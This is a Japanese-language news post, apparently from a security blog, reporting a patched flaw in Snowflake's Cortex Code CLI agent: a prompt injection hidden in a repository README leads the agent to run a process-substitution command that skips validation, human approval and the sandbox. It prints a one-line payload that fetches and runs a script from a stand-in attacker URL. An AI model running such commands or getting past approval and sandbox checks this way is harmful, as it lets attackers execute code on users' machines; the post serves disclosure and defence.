Snowflake Cortex Code CLIの脆弱性により、サンドボックスからの脱出とマルウェアの実行が可能になりました

✍️ OpenClawRadar📅 公開日: March 19, 2026🔗 Source
Snowflake Cortex Code CLIの脆弱性により、サンドボックスからの脱出とマルウェアの実行が可能になりました
Ad

脆弱性の詳細

Snowflake Cortex Code CLIは、Claude CodeやOpenAIのCodexと同様に動作するコマンドラインコーディングエージェントで、SnowflakeでSQLを実行するための組み込み統合機能を備えています。リリースから2日後、Cortex Codeのコマンド検証システムに脆弱性が発見され、特別に構築された悪意のあるコマンドが、人間による承認ステップをトリガーすることなく任意のコマンドを実行し、それらのコマンドをCortex CLIのサンドボックスの外で実行することが可能になりました。

攻撃の連鎖

この攻撃は間接的なプロンプトインジェクションを介して機能します。ユーザーがCortexを開きサンドボックスを有効にした後、サードパーティのオープンソースコードベースに関するヘルプをCortexに求めます。信頼できないリポジトリのREADMEに隠されたプロンプトインジェクションにより、Cortexは危険なコマンドを実行する必要があると誤認させられます。

Cortexはプロセス置換式内のコマンドを検証できず、悪意のあるコマンドの未承認実行を許してしまいました:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

このコマンドは攻撃者のサーバーからスクリプトをダウンロードして実行します。このバイパスが機能した理由は以下の通りです:

  • プロセス置換 <() 式内の安全でないコマンドは検証システムによって評価されなかった
  • 完全なコマンドは「安全な」コマンド(この場合はcat)で始まっていた
  • プロセス置換式内のコマンドは人間の承認をトリガーしなかった
Ad

サンドボックスバイパス

プロンプトインジェクションはまた、モデルを操作してサンドボックス外でのコマンド実行をトリガーするフラグを設定します。Cortexはデフォルトで、サンドボックス外でのコマンド実行をトリガーするフラグを設定でき、このインジェクションはこれを使用して悪意のあるコマンドがサンドボックスの外で実行されることを可能にします。

対策

Snowflakeのセキュリティチームはこの脆弱性を検証し対策を講じ、2026年2月28日にCortex Code CLIバージョン1.0.25で修正をリリースしました。Snowflakeの完全なアドバイザリはSnowflakeコミュニティサイトで入手可能です:https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

注:この攻撃連鎖は非サンドボックスユーザーにも適用されました。ドキュメントによると、OS+通常モードでは、すべてのコマンドがユーザーの承認を求めます。サンドボックスで実行されるコマンドにはネットワークおよびファイルアクセスの制限もあります。

📖 Read the full source: HN AI Agents

Ad

👀 See Also

AIセキュリティ研究者の方々:データ提供オプトイン設定により、0-day脆弱性が漏洩する可能性があります
Security

AIセキュリティ研究者の方々:データ提供オプトイン設定により、0-day脆弱性が漏洩する可能性があります

LLMインターフェースの「モデルを皆のために改善する」トグルは、深刻なレッドチーミング研究を自動的に収集し、脆弱性の概念をベンダーのセキュリティチームや、あなたが発表する前に学術論文に送信する可能性があります。本格的なセキュリティ研究を行う前にデータ共有を無効にしてください。

OpenClawRadar
LLM支援エクスプロイト:AnthropicのMythosプレビューがわずか5日で初のApple M5向け公開macOSカーネルエクスプロイトの構築を支援
Security

LLM支援エクスプロイト:AnthropicのMythosプレビューがわずか5日で初のApple M5向け公開macOSカーネルエクスプロイトの構築を支援

AnthropicのMythos Previewを活用し、セキュリティ企業CalifがApple M5シリコン上で初の公開macOSカーネルメモリ破壊エクスプロイトを5日間で構築。Appleが5年かけて開発したMIEハードウェアセキュリティを突破した。

OpenClawRadar
マイクロソフトのオープンソースツールがハッキング:AI開発者リポジトリにパスワード盗むマルウェア
Security

マイクロソフトのオープンソースツールがハッキング:AI開発者リポジトリにパスワード盗むマルウェア

ハッカーが少なくとも70のMicrosoft GitHubリポジトリにパスワードを盗むマルウェアを仕込み、Claude Code、Gemini CLI、VS Codeを使用するAI開発者を標的にした。これは以前のDurable Task侵害の再侵害である。

OpenClawRadar
OpenClawのセキュリティ懸念:デフォルトのセルフホスティングにおけるAPIキーと会話データのリスク
Security

OpenClawのセキュリティ懸念:デフォルトのセルフホスティングにおけるAPIキーと会話データのリスク

シスコのレポートによると、OpenClawのセキュリティは「オプションであり、組み込まれていない」とされており、デフォルト設定ではAPIキーがVPSインスタンスの.envファイルに保存されるため、基本的なドロップレットで運用する非技術ユーザーに潜在的なリスクをもたらす可能性があります。

OpenClawRadar